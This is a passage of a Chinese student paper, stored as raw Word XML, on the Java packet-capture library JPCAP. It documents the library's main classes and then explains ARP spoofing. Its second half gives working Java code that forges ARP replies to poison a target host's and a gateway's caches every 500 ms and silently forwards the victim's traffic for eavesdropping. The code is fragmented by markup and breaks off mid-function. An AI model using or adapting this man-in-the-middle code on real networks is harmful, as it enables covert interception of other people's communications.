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B9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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 半年前网络技术课的老师要我们做个ARP查询，老师是教人用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winsock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>的，可我一味钻java，干着急，钻进java世界到处查，终于找到这么一个东西。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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然后做了一个ARP监听器，没想到被老师看上了，说是国内JPCAP研究的人不多，可以考虑写一篇论文，老师给我推荐发表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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于是有了这么一篇东西。不过现在还不知道老师发哪个刊物去了。。。老师说，还没回音。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>JPCAP——JAVA中的数据链路层控制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．JPCAP简介</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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众所周知，JAVA语言虽然在TCP/UDP传输方面给予了良好的定义，但对于网络层以下的控制，却是无能为力的。JPCAP扩展包弥补了这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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JPCAP实际上并非一个真正去实现对数据链路层的控制，而是一个中间件，JPCAP调用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wincap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libpcap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 xml:space="preserve">，而给JAVA语言提供一个公共的接口，从而实现了平台无关性。在官方网站上声明，JPCAP支持FreeBSD 3.x, Linux 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RedHat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 xml:space="preserve"> 6.1, Fedora Core 4, Solaris, and Microsoft Windows 2000/XP等系统。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二．JPCAP机制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      JPCAP的整个结构大体上跟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wincap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libpcap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>是很相像的，例如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NetworkInterface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>类对应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wincap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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spellStart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_ADAPTER  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>ADAPTER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="spellStart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>getDeviceList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()对应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pcap_findalldevs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>()等等。 JPCAP有16个类，下面就其中最重要的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4个类做说明</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4AB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1．</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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NetworkInterface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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该类的每一个实例代表一个网络设备，一般就是网卡。这个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类只有</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一些数据成员，除了继承自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java.lang.Object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>的基本方法以外，没有定义其它方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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6064"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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divId w:val="110893470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数据成员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NetworkInterfaceAddress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3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addresses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 这个接口的网络地址。设定为数组应该是考虑到有些设备同时连接多条线路，例如路由器。但我们的PC机的网卡一般只有一条线路，所以我们一般取addresses[0]就够了。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java.lang.String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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datalink_description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 数据链路层的描述。描述所在的局域网是什么网。例如，以太网（Ethernet）、无线LAN网（wireless LAN）、令牌环网(token ring)等等。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java.lang.String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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datalink_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 该网络设备所对应数据链路层的名称。具体来说，例如Ethernet10M、100M、1000M等等。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java.lang.String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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description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 网卡是XXXX牌子XXXX型号之类的描述。例如我的网卡描述：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Realtek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RTL8169/8110 Family Gigabit Ethernet NIC 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Loopback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 标志这个设备是否loopback设备。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byte[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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mac_address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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网卡的MAC地址，6个字节。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java.lang.String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Name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 这个设备的名称。例如我的网卡名称：/Device/NPF_{3CE5FDA5-E15D-4F87-B217-255BCB351CD5}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2．</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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JpcapCaptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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该类提供了一系列静态方法实现一些基本的功能。该类一个实例代表建立了一个与指定设备的链接，可以通过该类的实例来控制设备，例如设定网卡模式、设定过滤关键字等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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976"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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divId w:val="171187462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数据成员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dropped_packets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="35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抛弃的包的数目。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protected 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ID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   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这个数据成员在官方文档中并没有做任何说明，查看JPCAP源代码可以发现这个ID实际上在其JNI的C代码部分传进来的，这类本身并没有做出定义，所以是供其内部使用的。实际上在对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JpcapCator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实例的使用中也没有办法调用此数据成员。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protected static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instanciatedFlag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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同样在官方文档中没有做任何说明，估计其为供内部使用。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protected static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MAX_NUMBER_OF_INSTANCE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="35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同样在官方文档中没有做任何说明，估计其为供内部使用。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received_packets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收到的包的数目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5000" w:type="pct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方法成员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static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NetworkInterface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getDeviceList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返回一个网络设备列表。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static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JpcapCaptor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openDevice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NetworkInterface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interface,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snaplen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promisc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to_ms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 创建一个与指定设备的连接并返回该连接。注意，以上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两个方法都是静态方法。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 Interface：要打开连接的设备的实例；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 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Snaplen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：这个是比较容易搞混的一个参数。其实这个参数不是限制只能捕捉多少数据包，而是限制每一次收到一个数据包，只提取该数据包中</w:t>
            </w:r>
            <w:proofErr w:type="gram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前多少</w:t>
            </w:r>
            <w:proofErr w:type="gram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字节；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 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Promisc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：设置是否混杂模式。处于混杂模式将接收所有数据包，</w:t>
            </w:r>
            <w:proofErr w:type="gram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若之后</w:t>
            </w:r>
            <w:proofErr w:type="gram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又调用了包过滤函数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setFilter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()将不起任何作用；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 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To_ms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：这个参数主要用于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processPacket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()方法，指定超时的时间；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void</w:t>
            </w:r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Close</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4AB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关闭调用该方法的设备的连接，相对于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openDivece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()打开连接。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JpcapSender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getJpcapSenderInstance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 该返回一个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JpcapSender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实例，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JpcapSender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类是专门用于控制设备的发送数据包的功能的类。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Packet</w:t>
            </w:r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getPacket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捕捉并返回一个数据包。这是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JpcapCaptor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实例中四种捕捉包的方法之一。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loopPacket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count,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PacketReceiver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handler)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 捕捉指定数目的数据包，并交由实现了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PacketReceiver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接口的类的实例处理，并返回捕捉到的数据包数目。如果count参数设为－1，那么无限循环地捕捉数据。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 这个方法不受超时的影响。还记得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openDivice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()中的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to_ms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参数么？那个参数对这个方法没有影响，如果没有捕捉到指定数目数据包，那么这个方法将一直阻塞等待。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine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PacketReceiver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中只有一个抽象方法void receive(Packet p)。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processPacket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count,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PacketReceiver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handler)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 跟</w:t>
            </w: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loopPacket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()功能一样，唯一的区别是这个方法受超时的影响，超过指定时间自动返回捕捉到数据包的数目。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dispatchPacket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count,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PacketReceiver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handler)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跟</w:t>
            </w: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processPacket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()功能一样，区别是这个方法可以处于“non-blocking”模式工作，在这种模式下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dispatchPacket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()可能立即返回，即使没有捕捉到任何数据包。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setFilter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java.lang.String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condition, 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optimize)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.condition：设定要提取的包的关键字。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 Optimize：这个参数在说明文档以及源代码中都没有说明，只是说这个参数如果为真，那么过滤器将处于优化模式。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setNonBlockingMode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nonblocking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  如果值为“true”，那么设定为“non-blocking”模式。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3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breakLoop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    当调用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processPacket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()和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loopPacket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()后，再调用这个方法可以强制让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processPacket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()和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loopPacket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()停止。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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3．</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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JpcapSender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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该类专门用于控制数据包的发送。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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6606"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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divId w:val="90800663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方法成员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close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 强制关闭这个连接。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static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JpcapSender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openRawSocket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    这个方法返回的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JpcapSender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实例发送数据包时将自动填写数据链路层头部分。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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A4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB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sendPacket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(Packet packet) </w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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JpcapSender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最重要的功能，发送数据包。需要注意的是，如果调用这个方法的实例是由</w:t>
            </w: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JpcapCaptor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的</w:t>
            </w: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getJpcapSenderInstance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()得到的话，需要自己设定数据链路层的头，而如果是由上面的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA4AB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openRawSocket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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()得到的话，那么无需也不能设置，数据链路层的头部将由系统自动生成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4．Packet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这个是所有其它数据包类的父类。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jpcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所支持的数据包有：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4AB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DatalinkPacket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EthernetPacket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ICMPPacket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IPPacket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TCPPacket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UDPPacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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三．使用JPCAP实现监听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1．监听原理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      在详细说用JPCAP实现网络监听实现前，先简单介绍下监听的原理。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      局域网监听利用的是所谓的“ARP欺骗”技术。在以前曾经一段阶段，局域网的布局是使用总线式（或集线式）结构，要到达监听只需要将网卡设定为混杂模式即可，但现在的局域网络普遍采用的是交换式网络，所以单纯靠混杂模式来达到监听的方法已经不可行了。所以为了达到监听的目的，我们需要“欺骗”路由器、“欺骗”交换机，即“ARP欺骗”技术。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      假设本机为A，监听目标为B。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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首先，伪造一个ARP REPLY包，数据链路层头及ARP内容部分的源MAC地址填入A的MAC地址，而源IP部分填入网关IP，目的地址填入B的MAC、IP，然后将这个包发送给B，而B接收到这个伪造的ARP REPLY包后，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由于源</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP为网关IP，于是在它的ARP缓存表里刷新了一项，将（网关IP，网关MAC）刷新成（网关IP，A的MAC）。而B要访问外部的网都需要经过网关，这时候这些要经过网关的包就通通流到A的机器上来了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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接着，再伪造一个ARP REPLY包，数据链路层头及ARP内容部分的源MAC地址填入A的MAC地址，而源IP部分填入B的IP，目的地址填入网关MAC、IP，然后将这个包发给网关，网关接收到这个伪造的ARP REPLY包后，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由于源</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP为B的IP，于是在它的ARP缓存表里刷新了一项，将（B的IP，B的MAC）刷新成</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（B的IP，A的MAC）。这时候外部传给B的数据包经过网关时，就通通转发给A。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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这样还只是拦截了B的数据包而已，B并不能上网——解决方法是将接收到的包，除了目的地址部分稍做修改，其它原封不动的再转发出去，这样就达到了监听的目的——在B不知不觉中浏览了B所有的对外数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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>ARP数据包解析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>单元：Byte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03"/>
        <w:gridCol w:w="1187"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="847"/>
        <w:gridCol w:w="1119"/>
        <w:gridCol w:w="801"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="655"/>
        <w:gridCol w:w="609"/>
        <w:gridCol w:w="622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:trHeight w:val="442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Ethernet头部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ARP数据部分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:trHeight w:val="44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２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６</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidTr="00AA4AB9">
        <w:trPr>
          <w:trHeight w:val="124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目标MAC地址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源地MAC地址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类型号0x0800:ip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0x0806:ARP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局域网类型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以太网0x0001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网络协议类型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IP网络0x0800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MAC/IP地址长度，恒为0x06/04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ARP包类型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REPLY</w:t>
            </w:r>
          </w:p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0x0002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ARP目标IP地址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ARP目标MAC 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ARP源IP地址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AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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AB9">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ARP源MAC地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4A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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2．用JPCAP实现监听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      就如上面说的，为了实现监听，我们必须做四件事：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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A．发送ARP包修改B的ARP缓存表；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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B．发送ARP包修改路由ARP缓存表；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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C．转发B发过来的数据包；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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D．转发路由发过来的数据包；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4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4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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下面我们给个小小的例子说明怎样实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我们假定运行这个程序的机器A只有一个网卡，只接一个网络，所在局域网为Ethernet，并且假定已经通过某种方式获得B和网关的MAC地址（例如ARP解析获得）。我们修改了B和网关的ARP表，并对他们的包进行了转发。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changeARP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private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NetworkInterface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[] devices;                           //设备列表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private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NetworkInterface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device;                               //要使用的设备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private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JpcapCaptor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                          //与设备的连接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private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JpcapSender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sender;                                       //用于发送的实例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private byte[]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targetMAC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,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gateMAC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         //B的MAC地址，网关的MAC地址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private byte[] String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targetIp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, String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gateIp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//B的IP地址，网关的IP地址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/**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*初始化设备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*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JpcapCaptor.getDeviceList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()得到设备可能会有两个，其中一个必定是“Generic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>*dialup adapter</w:t>
      </w:r>
      <w:proofErr w:type="gram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”</w:t>
      </w:r>
      <w:proofErr w:type="gram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，这是windows系统的虚拟网卡，并非真正的硬件设备。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>*注意：在这里有一个小小的BUG，如果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JpcapCaptor.getDeviceList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()之前有类似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JFrame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jf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=new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>*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JFame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（）这类的语句会影响得到设备个数，只会得到真正的硬件设备，而不会出现虚拟网卡。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>*虚拟网卡只有MAC地址而没有IP地址，而且如果出现虚拟网卡，那么实际网卡的MAC将分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*配给虚拟网卡，也就是说在程序中调用device.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mac_address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时得到的是</w:t>
      </w:r>
      <w:proofErr w:type="gram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00 00 00 00 </w:t>
      </w:r>
      <w:proofErr w:type="gram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00 00。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        */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NetworkInterface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getDevice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() throws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IOException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devices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JpcapCaptor.getDeviceList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();                                                 //获得设备列表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device = devices[0];                                                                                //只有一个设备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JpcapCaptor.openDevice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(device, 2000, false, 10000);             //打开与设备的连接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jpcap.setFilter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(“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”,true);                                                                       //只监听B的IP数据包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sender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captor.getJpcapSenderInstance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}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/**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*修改B和网关的ARP表。因为网关会定时发数据包刷新自己和B的缓存表，所以必须每隔一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*段时间就发一次</w:t>
      </w:r>
      <w:proofErr w:type="gram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包重新</w:t>
      </w:r>
      <w:proofErr w:type="gram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更改B和网关的ARP表。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*@参数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targetMAC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B的MAC地址，可通过ARP解析得到；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*@参数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targetIp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B的IP地址；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*@参数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gateMAC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网关的MAC地址；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*@参数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gateIp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  网关的IP;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*/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changeARP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(byte[]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targetMAC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, String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targetIp,byte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[]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gateMAC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, String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gateIp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throws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UnknownHostException,InterruptedException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this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.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targetMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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targetMAC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this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.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targetIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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targetIp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this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.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gateMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gateMAC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this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.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gateIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gateIp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getDevice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new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ARPPacket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();                                                     //修改B的ARP表的ARP包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arpTarget.hardtype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ARPPacket.HARDTYPE_ETHER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//选择以太网类型(Ethernet)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arpTarget.prototype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ARPPacket.PROTOTYPE_IP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  //选择IP网络协议类型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arpTarget.operation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ARPPacket.ARP_REPLY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           //选择REPLY类型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arpTarget.hlen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6;                                                                        //MAC地址长度固定6个字节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arpTarget.plen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4;                                                                        //IP地址长度固定4个字节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arpTarget.sender_hardaddr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device.mac_address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         //A的MAC地址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arpTarget.sender_protoaddr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InetAddress.getByName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gateIp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).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getAddress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();       //网关IP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arpTarget.target_hardaddr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targetMAC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;                                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4AB9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//B的MAC地址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arpTarget.target_protoaddr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InetAddress.getByName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targetIp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).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getAddress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();     //B的IP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EthernetPacket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ethToTarget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new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EthernetPacket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();                  //创建一个以太网头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ethToTarget.frametype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EthernetPacket.ETHERTYPE_ARP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//选择以太包类型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ethToTarget.src_mac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device.mac_address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                   //A的MAC地址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ethToTarget.dst_mac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targetMAC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                               //B的MAC地址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arpTarget.datalink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ethToTarget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                                    //将</w:t>
      </w:r>
      <w:proofErr w:type="gram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以太头</w:t>
      </w:r>
      <w:proofErr w:type="gram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添加到ARP包前</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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arpGate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new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ARPPacket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();                                                                 //修改网关ARP表的包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arpGate.hardtype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ARPPacket.HARDTYPE_ETHER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;             //</w:t>
      </w:r>
      <w:proofErr w:type="gram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跟以上</w:t>
      </w:r>
      <w:proofErr w:type="gram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相似，不再重复注析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arpGate.prototype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ARPPacket.PROTOTYPE_IP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arpGate.operation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ARPPacket.ARP_REPLY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arpGate.hlen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6;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arpGate.plen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4;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arpGate.sender_hardaddr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device.mac_address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arpGate.sender_protoaddr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InetAddress.getByName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targetIp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).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getAddress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arpGate.target_hardaddr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gateMAC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arpGate.target_protoaddr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InetAddress.getByName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gateIp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).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getAddress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EthernetPacket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ethToGate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new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EthernetPacket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ethToGate.frametype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EthernetPacket.ETHERTYPE_ARP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ethToGate.src_mac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device.mac_address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ethToGate.dst_mac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gateMAC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arpGate.datalink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ethToGate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thread=new Thread(new Runnable(){                                 //创建一个进程控制发包速度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void run() {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(true) {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               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sender.sendPacket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arpTarget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               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sender.sendPacket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arpGate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               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Thread.sleep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500);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}).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start(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recP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();                                                                                   //接收数据包并转发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lastRenderedPageBreak/>
        <w:t>/**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>*修改包的以太头，转发数据包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>*参数 packet               收到的数据包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*参数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changeMAC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要转发出去的目标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>*/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void send(Packet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, byte[]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changeMAC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) {                      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EthernetPacket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eth;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packet.datalink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instanceof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EthernetPacket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 {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eth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(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EthernetPacket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)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packet.datalink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0;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&lt; 6;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++) {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eth.dst_mac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[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]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changeMAC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[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];                      //修改包以太头，改变包的目标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 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eth.src_mac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[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] =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device.mac_address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[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];            //源发送者为A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}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sender.sendPacket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packet);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}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>/**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>*打印接受到的数据包并转发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>*/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void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recP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(){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IPPacket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ipPacket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= null;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while(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true){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9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   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ipPacket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 xml:space="preserve"> = （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IPPacket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）</w:t>
      </w:r>
      <w:proofErr w:type="spell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jpcap.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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getPacket</w:t>
      </w:r>
      <w:proofErr w:type="spell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 w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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System.out.println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>ipPacket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ipPacket.src_ip.getHostAddress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().equals(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targetIp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))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send(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packet,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gateMAC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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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packet, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
